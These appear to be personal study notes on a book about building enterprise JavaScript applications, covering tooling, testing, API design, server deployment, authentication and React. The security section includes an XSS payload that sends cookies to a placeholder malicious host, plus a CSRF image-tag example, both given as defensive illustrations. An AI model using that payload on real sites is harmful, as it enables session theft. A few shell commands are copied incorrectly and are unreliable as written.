Building Enterprise JavaScript Application=Daniel Li;Note=Erxin.txt

Building Enterprise JavaScript Application=Daniel Li;Note=Erxin

# Building Enterprise JavaScript Applications 
- Full stack developers working experience list

build tools, 
linters, 
testing frameworks, 
assertion libraries, 
package managers, 
module loaders, 
module bundlers, 
routers, 
web servers, 
compilers, 
transpilers, 
static typecheckers, 
virtual DOM libraries, 
state management tools, 
CSS preprocessors and UI Frameworks 
etc. 

- common in enterprise environment and high likelihood of remaining relevant for a long time 

This narrowed down the list to these tools—
Git, 
npm, 
yarn, 
Babel, 
ESLint, 
Cucumber, 
Mocha, 
Istanbul/NYC, 
Selenium, 
OpenAPI/Swagger, 
Express, 
Elasticsearch, 
React, 
Redux, 
Webpack, 
Travis, 
Jenkins, 
NGINX, 
Linux, 
PM2, 
Docker, and Kubernetes. 

We will utilize these tools to build a simple, but robust, user directory application that consists of a backend API and a frontend web user interface (UI).

- what's not covered 
    + static type checking 
    + configuration management with Puppet/Ansible
    + monitoring and visualizing metrics using Prometheus and Grafana 
    + distributed logging using Logstash/Kafka 
    + tracing using Zipkin 
    + stress/load testing using artillery 
    + backups and disaster recovery 
    
- example code 
- convention  
- get in touch 
- reviews 


# Section 1, Theory and practice 
- a Proof of Concept (PoC)  and Minimum Viable Product (MVP)
- Technical debt leads to low morale 
    + lack of talent 
    + lack of time 
    + lack of morale 
        * lower productivity 
        * lower code quality 
        * high turn over 
    
- repaying technical debt through refactoring. Should be the part of a development process 
    + well-structured 
    + well-documented 
    + succinct, be concise 
    + well-formatted and readable 
    
- prevent the technical debt 
    + informing the decision makers 
    + triple constraint model 
    time 
    cost 
    quality 
    
    + more decision makers pick time and cost over quality 

- don't be a hero. your business owner's/manager's role is to get as much out of you as possible. It's your duty to inform them what is possible and not

    + You may not actually complete the feature in time, while the business has planned a strategy that depends on that deadline being met.
    + You've demonstrated to the manager that you're willing to accept these deadlines, so they may set even tighter deadlines next time, even if they don't need to.
    + Rushing through code will likely incur technical debt.
    + Your fellow developers may resent you, since they may have to work overtime in order to keep up with your pace; otherwise, their manager may view them as slow. 

- defining processes 


## TDD 
- Acceptance Test-Driven Development (ATDD), where the test cases mirror the acceptance criteria set by the business. 

Another flavor is Behavior-Driven Development (BDD), where the test cases are expressed in natural language

- pick a feature and define a test case 
mocha 
chai 
it 

- avoiding manual tests, test as specification. this will enforce you break down your tasks 

This also helps you to abide by the You Aren't Gonna Need It (YAGNI) principle, which prevents you from implementing features that aren't actually needed.

- test as document, tests should be supplemented by inline comments and automatically-generated document 

- difficulties with TDD adoption 
    + inexperienced team 
    + slower initial development speed 
    + legacy code 
    + slow tests, unit/integration tests 

- when not to use TDD, TDD introduces a high initial cost 
    + Proof-of-concept (Poc)
    
    + product owner has not defined clear requirement. Show the quick development result and modify the code on new requirement 
 

## State of JavaScript, Client-Service Model or Single page application 
- browser using html DOM, css CSSOM to render the webpage 
- just in time compilers. 
- In the SPA model, the server would initially send the entire application, including any HTML, CSS, and JavaScript files, to the client. All the application logic, including routing, now resides on the client.

- drawback of SPA, The most obvious shortcoming of SPAs is that more code needs to be transferred. To counteract this deficiency, a technique called server-side rendering (SSR) can be employed.

- With SSR, the initial page is processed and rendered on the server in the same way as the traditional client-server model. However, the returned HTML contains a tag that'll request the rest of the application to be downloaded at a later time


## Managing version history with Git 
- the driessen model 

```
Time   feature branches...  develop   release branches...   hotfixes   master 
1       .   .                 |             .                   .       |
2       +---------------------o<----------------------------------------o
.       V   .                 |             .                   .       |
.       o   +-----------------o             .                   .       |
.       |   V                 |             .                   .       |
.       o   o                 |             .    +--------------o<------o
.       |   |                 |             .    |              |       |  
.       |   o                 |             .    |              +------>o
.       |   +---------------->o------------>o<---+                      |
.       |   .                 |             |                           |
.       o   .
.       |
```
- semantic versioning, MAJOR.MINOR.PATCH
Patch: After a backward-compatible hotfix
Minor: After a backward-compatible set of features/bug fixes have been implemented
Major: After a backward-incompatible change


# Section 2, Developing our backend API 
## Setting up dev tools 
- nodejs, npm, yarn etc 
- comic 
https://www.xkcd.com/

- ECMAScript features, http://kangax.github.io/compat-table/.

- using yarn instead of npm 
yarn (https://yarnpkg.com/) uses the same https://www.npmjs.com/ registry as the npm CLI.

you can use npm and yarn interchangeably. The differences are in their methods for resolving and downloading dependencies.

npm install package sequentially and yarn installs in parallel 

    + install from npm 
    $ npm install --global yarn
    
    + linux 
    curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add -echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.listsudo apt-get update && sudo apt-get install yarn

- package version locking 
    + yarn, by default, creates a lock file, yarn.lock. The lock file ensures that the exact version of every package is recorded
    
    + npm 5.0.0+ will create the lock file 
    
- command line comparison

yarn                   npm 
yarn install           npm install 
yarn add               npm install <package-name> 
yarn remove <pk>       npm uninstall <pk> 
yarn global add <pk>   npm install <pk> --global 
yarn upgrade           rm -rf node_modules && npm install 
yarn init              npm init 

- transplanter 
babel 
typescript 
coffee 

- separate the source and distribution code into two different directories.
- automating development using nodemon 
$ yarn add nodemon --dev 

nodemon is a tool that monitors for changes in our code and automatically restarts the node process when a change is detected

- linting with ESLint 
$ yarn add eslint --dev
$ npx eslint --init

- Adding pre-commit hooks, a tool called Husky, which hugely simplifies the process for us. Let's install it


## Write test 
- TDD, approach into practice by End-to-End(E2E) 
implementing a TDD workflow, specifically following the Red-Green-Refactor cycle
Write E2E tests with Cucumber and Gherkin

unit tests 

integration tests 

E2E/functional tests, flow of an application from start to finish. acting as if we are the end consumer 

UI test 

Manual test, unintuitive and bad user experience 

Acceptance tests, most focus on business need, Parts of the acceptance tests may be written in a Behavior-Driven Development (BDD) format

- formalizing requirements through documentation 
    + people have bad memories 
    + it prevents misinterpretation 
    + a formalized requirement provides a single source of truth 
    + a formalized requirement can be improved 
    
- refining requirements into specification and write tests as specification 
- writing manual test and using test case management tool 
TestLink (testlink.org), as well as proprietary alternatives, such as 
TestRail (gurock.com/testrail/), 
qTest (qasymphony.com/software-testing-tools/qtest-manager/), 
Helix TCM (perforce.com/products/helix-test-case-management), 
Hiptest (hiptest.net), 
PractiTest (practitest.com), and many more.

- setting up E2E test with cucumber 
- features, scenarios and steps 
- Gherkin keywords 
Feature 
Scenario 
Given, When, Then, And, But 
Background 
Scenario Outline 
Example 
""", doc string 
|, specify more complex data tables 
@, allows you to group relative scenarios together using tags 
(#), # allows you to specify comments 

    + Full Support VSCode Extension (github.com/alexkrechik/VSCucumberAutoComplete)
    
    + running scenarios 
    
    + implementing step definitions 
    
    + add asserts 
- using a debugger for node.js debugging 
    + chrome devtools
    
    To use Chrome DevTools for Node.js debugging, simply pass in the --inspect flag when you run node, then navigate to chrome://inspect/#devices in Chrome, and click on the Open dedicated DevTools for Node link, which will open the debugger in a new window.
    
    + using ndb, Google released ndb (https://github.com/GoogleChromeLabs/ndb), an "improved" debugger that is based on Chrome DevTools, and uses Puppeteer (github.com/GoogleChrome/puppeteer) to interact with Chromium over the DevTools Protocol. It requires at least Node.js v8.0.0
    
    $ yarn add ndb --dev 
    
    on windows also required install windows-build-tools 
    $ yarn global add windows-build-tools
    
- using the visual studio code debugger 
    + add debugger; command 
    
    + After you've set the breakpoint, go to the Debugger tab in your editor. Click the Start Debugging button
    
    + for babel,  To instruct VSCode to process modules, we can do one of two things:Install the @babel/node package and instruct VSCode to execute our file using babel-node.
    
    Instruct VSCode to add the --experimental-modules flag when running Node. This has been supported since Node v8.5.0.
    
    $ yarn add @babel/node --dev
    
- retaining line numbers 
    + work-in-progress commits 
    
- using express to implement the web application 
- run E2E test 
- moving common logic into middleware 
- validating our payload 
    

## Store data 
- Storing data in elasticsearch 
- install 
    + install java and elasticsearch 
    + understanding concepts indices, types and documents 
    + using elasticsearch JavaScript client to complete our create user endpoint 
    + writing a bash script to run our E2E tests with a single command 
    
- introduce elasticsearch, At its core, Elasticsearch is a high-level abstraction layer for Apache 

However, searching on normalized data is extremely inefficient. Therefore, to perform a full-text search, you would usually denormalize the data and replicate it onto more specialized database such as Elasticsearch.

- install elasticsearch client 
$ yarn add elasticsearch

- running tests in a test database 

You can find detailed instructions at docs.microsoft.com/en-us/windows/wsl/.

- The first line of a shell script is always the shebang interpreter directive; it basically tells our shell which interpreter it should use to parse and run the instructions contained in this script file.


## Modularizing our code 
- The single responsibility principle
- SOLID principle, which is a mnemonic acronym for single responsibility, open/closed, Liskov substitution, interface segregation, and dependency inversion.

- schema based validation 
    + The most common schema used in JavaScript is JSON Schema (json-schema.org).
    
    + joi (https://github.com/hapijs/joi) allows you to define requirements in a composable, chainable manner, which means that the code is very readable
    
    + validate.js (https://validatejs.org/) is another very expressive validation library, and allows you to define your own custom validation function. 

- interoperability 
Swift: JSONSchema.swift (https://github.com/kylef-archive/JSONSchema.swift)

Java: json-schema-validator (github.com/java-json-tools/json-schema-validator)

Python: jsonschema (pypi.python.org/pypi/jsonschema)

Go: gojsonschema (github.com/xeipuuv/gojsonschema)

- expressiveness, JSON schema supports many validation keywords 


## Writing Unit/ Integration Tests 
- mocha 
- record function calls with spies (spy in sinon), stubs, sinon library 
- dependency injection (DI) or monkey patching 
- measuring test coverage with istanbul/nyc 

https://github.com/istanbuljs/nyc

By default, nyc only collects coverage for source files that are visited during a test. It does this by watching for files that are require()'d during the test. When a file is require()'d, nyc creates and returns an instrumented version of the source, rather than the original. Only source files that are visited during a test will appear in the coverage report and contribute to coverage statistics.

- picking a testing framework 
Jasmine (jasmine.github.io), 

Mocha (mochajs.org), 

Jest (jestjs.io), and 

AVA (github.com/avajs/ava).

- This highlights the point that code coverage cannot detect bad tests.
- unifying test coverage 
- ignoring files with .nycrc file 


## Design our API 
- REST stands for representational state transfer, and is a set of architectural styles that dictates the manners and patterns in which you construct your API. REST is nothing new; Six requirement for REST. 

client-server 

stateless 

cacheable 

layered system 

code on demand 

uniform interface 

    + identification resources 
    
    + manipulation of resources 
    
    + self-descriptive messages 
    
    + hypermedia as the engine of application state(HATEOAS)
    
- what rest is not 
    + REST is an architectural style, and does not impose low-level implementation details.

- API design, consistency in API design 
http://restlet.com/company/blog/2017/05/18/the-four-levels-of-consistency-in-api-design/

- sending the correct HTTP status code 
Status      Class of response               Description 
1xx             Information         The request was received but not processed
2xx             Success 
3xx             Redirection 
4xx             Client error        The request is syntactically incorrect. 
5xx             Server error        The request is valid but error on the server

    + most developers won't be able to remember all the 62 APIs. common nine status code 
200     OK 
201     created 
400     bad request 
401     unauthorized 
403     forbidden 
404     not found 
409     conflict 
415     unsupported media type 
500     internal server 
- using http method 
GET, retrieval of a resource 
POST, requests where the server decides how to proces the request data 
PUT, put entity to be stored 
PATCH, partial changes to an existing resource 
DELETE, delete a resource 
HEAD, requests for the metadata of a resource 
OPTIONS, requests for information from the server 

    + the related concept of idempotency. An idempotent HTTP method is one that can be repeated multiple times but still produces the same outcome as if only a single request was sent.

method      safe            idempotency
connect     x               x
delete      x               x
get         v               v
head        v               v
options     v               v
post        x               x
put         x               v
patch       x               x
trace       v               v

- Following the guidelines, we will also structure our API paths using the /<collection>/<id> structure, where <collection> is a class of resources 

- using ISO formats, international organization for standardization 

date/time, 8601 

currencies, 4217 

countries, 3166-1 alpha-2

languages, ISO 639-2

- naming convention 

Use kebab-case for URLs

Use camelCase for parameters in the query string, for example, /users/12?fields=name,coverImage,avatar

For nested resources, structure them like so: /resource/id/sub-resource/id, for example, /users/21/article/583

- consistent data exchange format, JSON, XML etc. 
- error response payload 

code, a numeric error code to be used by the program 

message, a short, human-readable summary of the error 

description, an optional longer, more detailed description of the error 

- transversal consistency 
- domain consistency, identified with a PubMed Identifier (PMID), PMCID, Manuscript ID, or Digital Object Identifier (DOI), so your API's response object should include fields that contain these different identifiers

- perennial consistency, perennial means the API structure should stay the same for a long time, but not forever.
- breaking changes in APIs 
    + maintain workload 
    + different set of data 
    + prolong 

- future-proofing your URL, 
- future-proofing your data structure 
- versioning, if a breaking change cannot be avoided. we must abide the semantic versioning 

in the url, /v2/users 

as part of the accept header. Accept: application/vnd.hobnob.api.v2+json 

    + provide a grace period whenever possible 
    + provide deprecation warnings 
    + provide a clear list of all breaking changes 
    + provide clear instructions on how to migrate to the newer version 
    
- intuitive
    + API design. Likewise, an API should be self-explanatory and as obvious as possible.
    
- URLs for humans 
    + Related endpoints should be grouped. 
    foo.com/v1/{group}/...
    
- keep it simple stupid (KISS)
    + The rule is to think about what are the minimum set of functions that can be exposed, but still allow a typical user to perform all the necessary functions
    + more API exposes than think about take away a toy they are playing with, and you may find your ears ringing for a while.

- completing our API 
delete, by id 
search, 
create, 
retrieve, by id 
update 


## Deploying your application on a VPS, virtual private server, setup Nginx 
- VPS, virtual private server 
- obtaining an IP address 
- get IP from an Internet Service Provider (ISP). check server IP by 
$ curl ipinfo.io/ip 

- managed DNS 

The first issue can be mitigated using Managed DNS services, such as No-IP (noip.com) and Dyn (dyn.com), which provide a dynamic DNS service. 

The second issue can be mitigated by using port redirect, which is a service that most Managed DNS services also provide.

Dynamic DNS simply changes a DNS record; no application traffic actually arrives at the Managed DNS servers. On the other hand, with port redirect, the Managed DNS service acts as a proxy that redirects HTTP packets. If you'd like to try them out, No-IP provides a Free Dynamic DNS service, which you can sign up for at noip.com/free.

A better alternative is to register an account with a cloud provider and deploy our application on a VPS. A VPS is essentially a virtual machine (VM) that is connected to the internet and is allocated its own static IP address. In terms of costs, VPS can cost as low as $0.996 per month!

- VPS providers 
Amazon Elastic Compute Cloud (Amazon EC2): aws.amazon.com/ec2
IBM Virtual Servers: ibm.com/cloud/virtual-servers
Google Cloud Compute Engine: cloud.google.com/compute
Microsoft Azure Virtual Machines: azure.microsoft.com/services/virtual-machines
Rackspace Virtual Cloud Servers: rackspace.com/cloud/servers
Linode: linode.com

For this book, we are going to use DigitalOcean (DO, digitalocean.com). We picked DO because it has a very intuitive user interface (UI)

 You should also set up Two-Factor Authentication (2FA) on your account to keep it secure.
 
- naming your server 
[environment].[feature].[function][replica]

a load balancer for an authorization service in the staging environment, its hostname may be staging.auth.lb1.

- connect to remote server 
$ ssh root@<server-ip>

- set up account and create new user 
$ sudo adduser <username>

add to sudo group 
$ sudo usermod -aG sudo <username>

- setting up public key authentication 
- checking for existing ssh 
$ ~/.ssh/ && ls -ahl 

- creating an ssh key 
$ ssh-keygen -t rsa 4096 -C <your-email-address> 

- adding the ssh key to the remote server 
$ cat ~/.ssh/id_rsa.pub 
...

- using ssh-copy-id
- disable password-based authentication
- disable root login 
sshd_config 

PermitRootLogin no 

- firewall, iptables 
$ sudo iptables -L -n -v

- configure timezone 
$ sudo ufw allow OpenSSH 

- using ufw to run our API 
$ sudo ufw allow 8080

- keeping our API alive with PM2 

    + ubuntu provides upstart daemon upstart.ubuntu.com can monitor a service and respawn it 
    
    + npm package forever githu.com/foreverjs/forever 
    
    + pm2.keymetrics.io to be best process manager 
    
    $ yarn add pm2 --dev 

- privileged ports 
$ sudo ufw allow 80 
$ sudo ufw delete allow 8080 

- running as root no 
- de-escalating privileges, de-escalate the privileges later by setting the user and group identity of the process to the user/group who issued the sudo command. We do this by using the environment variables SUDO_UID and SUDO_GID, and setting them using process.setgid and process.setuid:

- setting capabilities. Another solution is to set capabilities.On Linux, when a thread or process requires certain privilege(s) to perform an action, such as reading a file or binding to a port, it checks with a list of capabilities.

binding to privileged ports 
$ sudo setcap CAP_NET_BIND_SERVICE=+ep $(which node)

check the capability by using getcap 
$ sudo getcap $(which node)

$ sudo setcap -r $(which node)
$ sudo getcap $(which node)

- using authbind, authbind is a system utility that allows users without superuser privileges to access privileged network services, including binding to privileged ports:

$ sudo apt install authbind

if a user has permission to access the /etc/authbind/byport/<port> file, then that user is able to bind to that port 
$ sudo touch /etc/authbind/byport/80
$ sudo chown hobnob /etc/authbind/byport/80
$ sudo chmod 500 /etc/authbind/byport/80
$ npx pm2 delete 0; authbind --deep yarn run serve

- using iptables, we could use the firewall redirect the access from 80 to 8080 
$ sudo iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

- using reverse proxy, most popular method is to use a reverse proxy server to redirect traffic from one port to another. 

    + reverse proxy receives a request 
    + replay the request to the proxied service 
    + it receives the response from the service 
    + it sends the response back to the client 
    
- NGINX
    + can host multiple services 
    + handle ssl encryption 
    + caching and GZIP compression 
    + act as a load balancer 
    + configuration as code 
    + update the nginx setting 
    
- Installation for other platforms can be found at nginx.com/resources/wiki/start/topics/tutorials/install/. 

$ echo "deb http://nginx.org/packages/ubuntu/ bionic nginx" | sudo tee -a /etc/apt/sources.list.d/nginx.list

By default, there are two places that Ubuntu will search: inside the /etc/apt/sources.list file and inside files under the /etc/apt/sources.list.d/ directory. 

regenerate source list 
$ echo "deb http://nginx.org/packages/ubuntu/ bionic nginx" | sudo tee -a /etc/apt/sources.list.d/nginx.list

- configure nginx, There are two types of directives: simple and block.
- configuring the http module. 
http {
    server {
        ...
    }
}

available fields 
listen 
server_name 
location 
root 
proxy_pass 

- buy a domain 
- understanding DNS, a full interrogation of the process http://blog.danyll.com/resolving-domain-names/

The resolving nameserver would first check its internal cache, and use the cached entry if available. If it cannot find an entry for your FQDN, it will query one of the top-level domain (TLD) nameservers. They will return the IP address of a domain-level nameserver

- updating the domain nameserver. Go to your Namecheap Dashboard (ap.www.namecheap.com) and select your domain. 

Because resolving nameservers caches results, it may take up to 48 hours for our changes to be propagated to all nameservers. You can use services such as whatsmydns.net to check the propagation progress for different nameservers around the world.

- building our zone file. A zone file is a text file that describes a DNS zone, which is any distinct, contiguous portion of the domain namespace that is managed by a single entity

UI provided by DigitalOcean to manage our DNS settings. If you have chosen a different hosting provider, the UI may be different
 
The next most important record types are the A and AAAA records, which map a hostname to an IP address. A maps the host to an IPv4 address, whereas an AAAA record maps it to an IPv6 address.

- Start of authority(SOA). 

hobnob.social.  IN  SOA  ns1.digitalocean.com.  dan.danyll.com  ( <serial>, <refresh>, <retry>, <expiry>, <negativeTTL> )

    + ns1.digitalocean.com is the primary master nameserver, which holds the most up-to-date zone file.

    + dan.danyll.com is the email for the administrator responsible for this DNS zone.
    
    + <serial> is the serial number for the zone file, which is essentially a version counter. 
    
    + <refresh> is the amount of time a slave nameserver will wait before pinging the master server to see whether it needs to update its zone file.
    
    + <retry> is the amount of time a slave nameserver will wait before pinging the master server again
    
    + <expiry> is the amount of time that the zone file should still be deemed to be valid
    
    + <negativeTTL> is the amount of time the nameserver will cache a lookup that failed 

- updating ugnix 

In the /etc/nginx/sites-available and /etc/nginx/sites-enabled directories, update the names of the files to the corresponding FQDN

$ cd /etc/nginx/sites-available/
$ sudo mv api api.hobnob.social
$ cd /etc/nginx/sites-enabled/
$ sudo rm api
$ sudo ln -s /etc/nginx/sites-available/api.hobnob.social \ /etc/nginx/sites-enabled/

server {    
    listen 80 default_server;    
    server_name api.hobnob.social    
    location {        
        proxy_pass http://localhost:8080;    
    }
}

$ sudo systemctl reload nginx.service


## Continuous integration 
- TDD 
- CI server 
Travis, 
CircleCI, 
Bamboo, 
Shippabl)

self-hosted CI-capable platforms (such as 
Jenkins, 
TeamCity, 
CruiseControl, 
BuildBot

- integrate with a CI server 
    + SCM, source code maangement 
    + build triggers 
    + build environment 
    + build 
    + post-build action 
    
- activating our project 
- GitHub's Commit Status API (developer.github.com/v3/repos/statuses/), which allows third parties to attach a status to commits. 

- CI pipe line 

The complete Global Variables list can be found at /pipeline-syntax/globals.

- installing docker 
- integrate with github and github hook. Using the github plugin 
- how you how to implement a stateless authentication and authorization scheme using JSON Web Tokens (JWTs). Being stateless is extremely important to ensure the scalability of our application

Understand encoding, hashing, salting, encryption, block ciphers, and other cryptographic techniques
Understand and implement password-based authentication
Understand and implement token-based authentication using JSON Web Tokens (JWTs)I
mplement authorization checks to make sure users can only perform actions that we allow


## Security 
- password authentication 

Passwords can be brute-forced: a malicious party can try out common passwords

man in the middle attack 

e strong passwords to prevent brute-force attacks, and also cryptographically hash the password before sending it over the wire

- hashing passwords  
- cryptographic hash functions 
    + MD5 is not a suitable algorithm for hashing passwords because although the digests look like gibberish, there are now tools that can use the digest to reverse-engineer the password
    
    + cryptographic has functions for hash the password 
    
    deterministic 
    
    one-way 
    
    exhibits the avalanche effect 
    
    collision-resistant 
    
    slow robust 

    + hashing algorithms, most popular ones: 
    MD4, 
    MD5, 
    MD6, 
    SHA1, 
    SHA2 series (including SHA256, SHA512), 
    SHA3 series (including SHA3-512, SHAKE256), R
    IPEMD, 
    HAVAL, 
    BLAKE2, 
    RipeMD, 
    WHIRLPOOL, 
    Argon2, 
    PBKDF2, 
    bcrypt.
    
    modern cryptographic hash functions such as PBKDF2 and bcrypt.
    MD5, SHA1 are not secure now 
    
    + There are three modern algorithms that utilize hash stretching: Password-Based Key Derivation Function 2 (PBKDF2), bcrypt, and scrypt. 

- generate fake salt 
- login, Specify a password digest when creating a new userQuery for the digest salt

- keeping users authenticated 
seession IDs, This session ID is simply a long, randomly generated text. The idea is that because the string is long and random enough that no one would be able to guess a valid session ID

claims (tokens), formatted into a standardized format and signed using a key, producing a token. This token is then sent back to the client, which attaches it to every request 
    + stateless 
    + reduced server load 
    + scalability 
    + information-rich 
    + portable/transferable 
    + more secure 
    
- anatomy of a JWT 
header 
payload 
signature 

JWT is a JSON Web Signature (JWS) or JSON Web Encryption (JWE). You can find the full list of headers at iana.org/assignments/jose/jose.xhtml.

- They are defined in the JWT specification and can be found on the Internet Assigned Numbers Authority (IANA)

- Asymmetric signature generation
Rivest–Shamir–Adleman (RSA) family, which uses the SHA hash algorithm, and includes RS256, RS384, and RS512

Elliptic Curve Digital Signature Algorithm (ECDSA) uses the P-256/P-384/P-521 curve and SHA hash algorithm, and include ES256, ES384, and ES512

- Symmetric signature generation, algorithms include the Keyed-hash message authentication code (HMAC) with the SHA hash algorithm, and includes HS256, HS384, and HS512

- terminology and summary 

A JSON Web Token (JWT) is a string that includes the JOSE Header and the claim set, and is signed and (optionally) encrypted.

JSON Web Algorithms (JWA) specification, which uses cryptographic keys as defined in the JSON Web Key (JWK) specification. The combination of the header, claim set, and signature becomes the JSON Web Signature (JWS).

- using library jsonwebtoken for nodejs 
- generating the token. using the private key, stored at process.env.PRIVATE_KEY, to sign the token:

- http cookies 

    + using http cookies 
Response from server: 
Set-Cookie: <cookie-name>=<cookie-value>; Domain=<domain-value>; Expires=<date>

most browser clients will automatically send this key-value store back with each subsequent request, this time inside a Cookie header:
Cookie: name1=value1; name2=value2

cookies are also vulnerable to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (XSRF) attacks.

- XSS, cross-site scripting 

if the server does not sanitize comments then a malicious party can write following comment 

document.write('<img src="https://some.malicious.endpoint/collect.gif?cookie=' + document.cookie + '" />')

- Cross-Site Request Forgery (XSRF)

<img src="http://target.app/change-password/?newPassword=foobar">

- HTTP headers 

Instead, we should store the token using one of the modern web storage APIs (sessionStorage or localStorage), and send it back using HTTP header fields.

- Authorization header 

authentication schemes supported, such as Basic, Bearer, Digest, Negotiate, and OAuth, plus many more. The most common schemes are Basic and Bearer

- preventing man in the middle (MITM) attacks 

    + implement end-to-end encryption (E2EE) of the connection using Hyper Text Transfer Protocol Secure (HTTPS), the secure version of HTTP. To use HTTPS, you'd need to set up an SSL/TLS certificate for your domain
    
    + certificate authority (CA)
    
     enable HTTPS on the API, the Linux Foundation provides a free CA called Let's Encrypt (letsencrypt.org). It also provides a tool called Certbot (certbot.eff.org), which enables you to automatically deploy Let's Encrypt certificates. 
     
    + read about MITM attacks, http://owasp.org/index.php/Man-in-the-middle_attack.

- encrypting digest, prevent attacker get both the salt and the digest, then they could brute force a user's password 

this issue is to use a pepper—a variation of a salt, with the following differences:The pepper is not publicThe pepper is not stored in the database, but on another application server, so that the pepper is separate from the saltThe pepper may be a constant that's set in the application server as an environment variable

- block cipher, an algorithm for symmetric-key encryption, takes two parameters—a plaintext and a key—and runs them through the algorithm to generate a ciphertext

- exploring the secure remote password (SRP) protocol 

SRP is used by Amazon Web Services (AWS) and Apple's iCloud, among others. So if security is something that interests you

extracted from SRP's official website (srp.stanford.edu/whatisit.html)



## Documenting our API, completes the development of our API by documenting it using Swagger 
- user friendly API documentation 
- high-level overview of our API 

overview of platform 
example use cases 
where to find more resources 
includes a step by step guide tour 
includes API specification 

- overview of OpenAPI specification(OAS), YAML, Swagger UI 

example when calling POST /login 

'''
paths:
  /login:
    post:
      requestBody:
        description: User Credentials
        required: true
        content:
          application/json:
            schema:
              properties:
                email:
                  type: string
                  format: email
                digest:
                  type: string
                  pattern: ^\\$2[aby]?\\$\\d{1,2}\\$[.\\/A-Za-z0-9]{53}$
      responses:
        '200':
          $ref: '#/components/responses/LoginSuccess'
        '400':
          $ref: '#/components/responses/ErrorBadRequest'
        '401':
          $ref: '#/components/responses/ErrorUnauthorized'
        '500':
          $ref: '#/components/responses/ErrorInternalServer'
'''

- open source tools (such as Dredd—http://dredd.org ), we can automatically test our API server to see if it complies with the specification.

https://apiblueprint.org 

- pick a API specification language 

OpenAPI (formerly Swagger). 

RAML 

API Blueprint

- Swagger toolchain, OAS 2.0 is identical to Swagger 2.0 apart from the name.

Editor, http://petstore.swagger.io

UI 

Codegen 

Inspector, test your endpoints, validate REST, GraphQL, and SOAP APIs. Like Postman, it saves a history of your past queries

- write API specification with YAML 
    +  key-value pairs and lists. To represent a set of key-value pairs, simply write each one on a new line, separated by a colon and space:
    
    title: Hobnob 
    description: simple publishing platform 
    
    + To conserve newline characters, use the pipe (|) character

    Or to break a line of text over multiple lines use the greater-than character (>):
    
    contact:
        name: > 
            a 
            b 
            c
    
- overview of root fields of OpenAPI
openapi: "3.0.0"
info:
  title: Hobnob User Directory
  version: "1.0.0"
  contact:
    name: Support
    email: dan@danyll.com
servers:
  - url: http://localhost:8080/
    description: Local Development Server
tags:
  - name: Authentication
    description: Authentication-related endpoints
  - name: Users
    description: User-related endpoints
  - name: Profile
    description: Profile-related endpoints
    
- specifying the GET/salt endpoint
- The full specification for the Operation Object can be found at github.com/OAI/OpenAPI-Specification/blob/master/versions/3.0.0.md#operation-object.

paths:
  /salt:
    get:
      tags:
        - Authentication
      summary: Returns the salt of a user based on the user's email
      description: Even if there are no users with the specified email, this endpoint will still return with a salt. This is to prevent the API leaking information about which email addresses are used to register on the platform.
      
- generating documentation with swagger 

Swagger UI source files from github.com/swagger-api/swagger-ui/releases and statically serve the page at dist/index.html.

- enable cross-origin resource sharing (CORS).  full specification at http://w3.org/TR/cors/.

app.use((req, res, next) => {
  res.header('Access-Control-Allow-Origin', '*');
  res.header('Access-Control-Allow-Headers', 'Origin, X-Requested-With, Content-Type, Accept');
  next();
});


# Section 3, Developing your frontend UI 
## Creating UI 
- SPA are great improvement over multi-page applications 

uses a client 

- vanilla JavaScript vs. Frameworks 

AngularJS/Angular, React, Vue.js, Ember, and Meteor provides 
    + routing 
    + dom manipulation 
    + data binding 
    
 Aurelia, Ember, Polymer, Backbone, AngularJS/Angular, Vue.js, React, Preact, Knockout, jQuery, Mithril, Inferno, Riot, Svelte

    + virtual DOM, react would then compare the old virtual DOM state with the new one, and calculate the most efficient way of manipulating the real DOM 
    
- JSX, a new language. allows developers to define components of the UI in an HTML-like syntax 

document.createElement(), React.createElement(), or a templating engine, you can write your component in JSX. 

- in terms of flexibility, React and Vue.js are the winners here.
- cross-platform 
- hybird application with ionic, cross-platform 
- "Jack of all trades, master of none". Therefore, having a consistent stack for all your front-end projects is important. 

- native UI with react native and weex. Swift/Object-C 
- learning curve 
typescript, static typing to javascript 
RxJS, write functional reactive code 
SystemJS, a module loader 
karma, a tool for running unit tests 
Protractor, an E2E test runner, allows you to run tests that interact with a real browser

- However, many React developers also use libraries, such as ImmutableJS, Flow, TypeScript, Karma, and ESLint, which are not compulsory tools
    
- learning and using React 
- client side module, react, angularjs etc. 
- module bundling, you'll encounter in the wild: Browserify, Webpack, Rollup, and Parcel.

    + Browserify was the first module bundler and it changed the way frontend code was written. 
    
    Browserify will analyze and follow the require calls from an entry point JavaScript file, build up a list of dependencies
    
    + Whilst Browserify did only module bundling, Webpack also tries to integrate features from popular task runners, such as Grunt or Gulp.

- asynchronous module loading     
    + Asynchronous Module Definition (AMD) is the most popular module specification that implements asynchronous module loading. 
    
    + The most popular module loader is Require.js. Require.js provides you with a define function, which you can use to define your module.
    
    + UMD, or Universal Module Definition, is a module definition format that aims to be compatible with both CommonJS and AMD.
    
- SystemJS and Loader specification, http://whatwg.github.io/loader 

SystemJS is an implementation of the Loader specification that works on the browser. More specifically, SystemJS is a universal dynamic module loader. 

- jspm,  jspm, which stands for JavaScript Package Manager.

- HTTP/2, HTTP/1.1, Establishing a TCP connection requires a three-way handshake which is expensive 

initiator           listener 
connect()----syn----->listen()
        <--syn-ack---
        -----ack---->

With HTTP/2's multiplexing feature, a single TCP connection can be used to make multiple HTTP requests.

- check browser features 

http://caniuse.com (caniuse.com/#feat=http2)

http://W3Techs (w3techs.com/technologies/details/ce-http2/all/all)

- using webpack 

## E2E testing React 
- TDD, using selenium 

- browser testing, test on real browser 

Karma, https://karma-runner.github.io/2.0/index.html 

- writing E2E test with Gherkin, cucumber and selenium 
- selenium 
    + selenium remote control 
    + webdriver 
    + selenium server 
    + selenium grid distrubte your tests over multiple machines or virtual machines(VMs). 
    + selenium IDE is a chrome extensin/firefox extension provdie a rapid prototyping tool for building test scripts. 
    
- webdriver API, https://www.w3.org/TR/webdriver/. The document is currently in the Candidate Recommendation stage.
- headless browser 
PhantomJS, http://phantomjs.org 
SlimerJS, https://slimerjs.org 
ZombieJS, http://zombie.js.org 
HtmlUnit, http://htmlunit.sourceforege.net 
- working with React Router client-side routing 
- headless browser list 

Asad Dhamani has curated a list which you can find at https://github.com/dhamaniasad/HeadlessBrowsers 

